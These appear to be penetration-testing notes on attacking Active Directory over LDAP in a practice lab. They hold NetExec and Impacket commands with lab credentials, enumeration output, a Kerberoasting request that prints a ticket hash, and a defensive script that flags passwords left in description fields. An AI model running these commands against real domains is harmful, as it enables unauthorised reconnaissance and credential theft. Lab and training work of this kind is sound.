LDAP Attacks (Port 389)
NetExec: LDAP Enumeration
Enumerate directory information from the target Windows domain controller over LDAP. Tools such as nxc (NetExec) authenticate to the LDAP service with domain credentials and query it for users, groups and other directory objects.
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --users
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL [*] Enumerated 16 domain users: north.sevenkingdoms.local
LDAP 10.10.10.11 389 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.10.11 389 WINTERFELL Administrator 2025-10-18 18:41:56 0 Built-in account for administering the computer/domain
LDAP 10.10.10.11 389 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.10.11 389 WINTERFELL vagrant 2021-05-12 11:39:16 0 Vagrant User
LDAP 10.10.10.11 389 WINTERFELL krbtgt 2025-10-18 19:07:40 0 Key Distribution Center Service Account
LDAP 10.10.10.11 389 WINTERFELL arya.stark 2025-10-31 23:47:19 0 Arya Stark
LDAP 10.10.10.11 389 WINTERFELL eddard.stark 2025-10-31 23:47:22 0 Eddard Stark
LDAP 10.10.10.11 389 WINTERFELL catelyn.stark 2025-10-31 23:47:24 0 Catelyn Stark
LDAP 10.10.10.11 389 WINTERFELL robb.stark 2025-10-31 23:47:26 0 Robb Stark
LDAP 10.10.10.11 389 WINTERFELL sansa.stark 2025-10-31 23:47:28 0 Sansa Stark
LDAP 10.10.10.11 389 WINTERFELL brandon.stark 2025-10-31 23:47:31 0 Brandon Stark
LDAP 10.10.10.11 389 WINTERFELL rickon.stark 2025-10-31 23:47:33 0 Rickon Stark
LDAP 10.10.10.11 389 WINTERFELL hodor 2025-10-31 23:47:35 0 Brainless Giant
LDAP 10.10.10.11 389 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
LDAP 10.10.10.11 389 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
LDAP 10.10.10.11 389 WINTERFELL jeor.mormont 2025-10-31 23:47:41 0 Jeor Mormont
LDAP 10.10.10.11 389 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
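The listing above shows a credential parked in samwell.tarly's description attribute, a common finding an auditor wants to catch. The script below is an added example (not part of the original notes or of NetExec): it parses a constructed sample of `nxc ldap --users` output in the same row format and flags descriptions that look like they carry a password, so the check can be run over a saved listing.

```python
import re

# Constructed sample of `nxc ldap ... --users` output, modelled on the listing
# in these notes (not captured from a live host).
NXC_USERS_OUTPUT = """\
LDAP 10.10.10.11 389 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.10.11 389 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.10.11 389 WINTERFELL jon.snow 2025-10-31 23:47:37 0 Jon Snow
LDAP 10.10.10.11 389 WINTERFELL samwell.tarly 2025-10-31 23:47:39 0 Samwell Tarly (Password : Heartsbane)
LDAP 10.10.10.11 389 WINTERFELL sql_svc 2025-10-31 23:47:43 0 sql service
"""

# One user row: protocol/host/port/name prefix, username, "<never>" or a
# "YYYY-MM-DD HH:MM:SS" timestamp, bad-password count, free-text description.
ROW_RE = re.compile(
    r"^LDAP\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<user>\S+)\s+"
    r"(?P<pwset><never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)\s*"
    r"(?P<desc>.*)$"
)

# Words that usually mean someone stored a secret in the description attribute.
SECRET_HINT_RE = re.compile(
    r"\b(pass(word|wd)?|pwd|secret|cred(ential)?s?)\b", re.IGNORECASE
)


def parse_users(output: str) -> list[dict]:
    """Turn nxc --users output into a list of row dicts; the header and any
    status lines do not match ROW_RE and are skipped."""
    users = []
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m and m.group("user") != "-Username-":
            users.append(m.groupdict())
    return users


def find_description_leaks(users: list[dict]) -> list[tuple[str, str]]:
    """Return (username, description) for accounts whose description looks
    like it holds a credential."""
    return [(u["user"], u["desc"]) for u in users if SECRET_HINT_RE.search(u["desc"])]


if __name__ == "__main__":
    for user, desc in find_description_leaks(parse_users(NXC_USERS_OUTPUT)):
        print(f"[!] {user}: description may contain a credential -> {desc!r}")
```

A hit here means the description attribute, readable by every authenticated domain user, should be cleaned and the account's password rotated.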
Group Enumeration
nxc ldap 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --groups
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP 10.10.10.11 389 WINTERFELL Administrators
LDAP 10.10.10.11 389 WINTERFELL Users
LDAP 10.10.10.11 389 WINTERFELL Guests
LDAP 10.10.10.11 389 WINTERFELL Print Operators
LDAP 10.10.10.11 389 WINTERFELL Backup Operators
LDAP 10.10.10.11 389 WINTERFELL Replicator
LDAP 10.10.10.11 389 WINTERFELL Remote Desktop Users
LDAP 10.10.10.11 389 WINTERFELL Network Configuration Operators
LDAP 10.10.10.11 389 WINTERFELL Performance Monitor Users
LDAP 10.10.10.11 389 WINTERFELL Performance Log Users
LDAP 10.10.10.11 389 WINTERFELL Distributed COM Users
LDAP 10.10.10.11 389 WINTERFELL IIS_IUSRS
LDAP 10.10.10.11 389 WINTERFELL Cryptographic Operators
LDAP 10.10.10.11 389 WINTERFELL Event Log Readers
LDAP 10.10.10.11 389 WINTERFELL Certificate Service DCOM Access
LDAP 10.10.10.11 389 WINTERFELL RDS Remote Access Servers
<< SNIP FOR BREVITY >>
Impacket: Get Users SPN
Get Users SPN (Service Principal Name)
impacket-GetUserSPNs -request -dc-ip 10.1.142.44 buildingmagic.local/r.widdleton
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------------- --------- -------- -------------------------- -------------------------- ----------
HOGWARTS-DC/r.hagrid.WIZARDING.THM:60111 r.haggard 2025-05-15 17:09:04.002067 2025-05-15 18:34:51 644710
[-] CCache file is not found. Skipping...
$krb5tgs$23$*r.haggard$BUILDINGMAGIC.LOCAL$buildingmagic.local/r.haggard*$59f4f0560a3b4f0fb0d6ce6a273a11e8$fc76d13822ff9de3b10695216b3e94f7d85d9aa2aa27e7ade5927727986e735f9bd593743f8d22c71c6d28b7213ee41e5dc3e29fe462ae413c4960a3ecda6a6d33b944e76690037c1205e3d97264dfe26c7d0856e9c5e8ae74a46bdc94cf6bcfe2bd76d01f5ca0da808d026252fd8fda09550d34eb6cb
<< SNIP FOR BREVITY >>
Impacket: Look up SID
Look up SID
impacket-lookupsid north.sevenkingdoms.local/samwell.tarly:Heartsbane@10.10.10.11
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.10.10.11
[*] StringBinding ncacn_np:10.10.10.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-928725054-1381016483-1750705438
500: NORTH\Administrator (SidTypeUser)
501: NORTH\Guest (SidTypeUser)
502: NORTH\krbtgt (SidTypeUser)
<< SNIP FOR BREVITY >>
1000: NORTH\vagrant (SidTypeUser)
1001: NORTH\WINTERFELL$ (SidTypeUser)
1102: NORTH\DnsAdmins (SidTypeAlias)
1103: NORTH\DnsUpdateProxy (SidTypeGroup)
1104: NORTH\SEVENKINGDOMS$ (SidTypeUser)
1105: NORTH\CASTELBLACK$ (SidTypeUser)
1106: NORTH\Stark (SidTypeGroup)
1107: NORTH\Night Watch (SidTypeGroup)
1108: NORTH\Mormont (SidTypeGroup)
1109: NORTH\AcrossTheSea (SidTypeAlias)
1110: NORTH\arya.stark (SidTypeUser)
1111: NORTH\eddard.stark (SidTypeUser)
1112: NORTH\catelyn.stark (SidTypeUser)
1113: NORTH\robb.stark (SidTypeUser)
1114: NORTH\sansa.stark (SidTypeUser)
1115: NORTH\brandon.stark (SidTypeUser)
1116: NORTH\rickon.stark (SidTypeUser)
1117: NORTH\hodor (SidTypeUser)
1118: NORTH\jon.snow (SidTypeUser)
1119: NORTH\samwell.tarly (SidTypeUser)
1120: NORTH\jeor.mormont (SidTypeUser)
1121: NORTH\sql_svc (SidTypeUser)
Impacket: Get AD Users
Impacket's GetADUsers queries Active Directory for user accounts. Given valid domain credentials, it binds to the domain controller over LDAP and returns each user's name, email address, password-last-set and last-logon timestamps.
impacket-GetADUsers -all -dc-ip 10.10.10.11 'north.sevenkingdoms.local'/samwell.tarly:Heartsbane
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Querying 10.10.10.11 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------- ------------------- -------------------
Administrator 2025-10-18 14:41:56.846264 2025-12-05 13:05:45.806754
Guest <never> <never>
vagrant 2021-05-12 07:39:16.765445 2025-10-31 20:07:24.355437
krbtgt 2025-10-18 15:07:40.379595 <never>
2025-11-22 23:06:06.718454 <never>
arya.stark 2025-10-31 19:47:19.581387 2025-11-25 21:21:28.987203
eddard.stark 2025-10-31 19:47:22.283782 2025-12-12 18:12:12.634291
catelyn.stark 2025-10-31 19:47:24.517764 <never>
robb.stark 2025-10-31 19:47:26.751693 2025-12-12 18:13:22.045271
sansa.stark 2025-10-31 19:47:28.970073 <never>
brandon.stark 2025-10-31 19:47:31.063463 2025-12-11 22:12:31.235346
rickon.stark 2025-10-31 19:47:33.140457 <never>
hodor 2025-10-31 19:47:35.218876 <never>
jon.snow 2025-10-31 19:47:37.296408 <never>
samwell.tarly 2025-10-31 19:47:39.405180 <never>
jeor.mormont 2025-10-31 19:47:41.468693 <never>
sql_svc 2025-10-31 19:47:43.438914 2025-12-12 17:42:31.537152
Impacket: Get AD Computers
Lists all computer objects in the domain.
impacket-GetADComputers -dc-ip 10.10.10.11 'north.sevenkingdoms.local'/samwell.tarly:Heartsbane
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Querying 10.10.10.11 for information about domain.
SAM AcctName DNS Hostname OS Version OS
--------------- ----------------------------------- --------------- --------------------
WINTERFELL$ winterfell.north.sevenkingdoms.local 10.0 (17763) Windows Server 2019 Datacenter Evaluation
CASTELBLACK$ castelblack.north.sevenkingdoms.local 10.0 (17763) Windows Server 2019 Datacenter Evaluation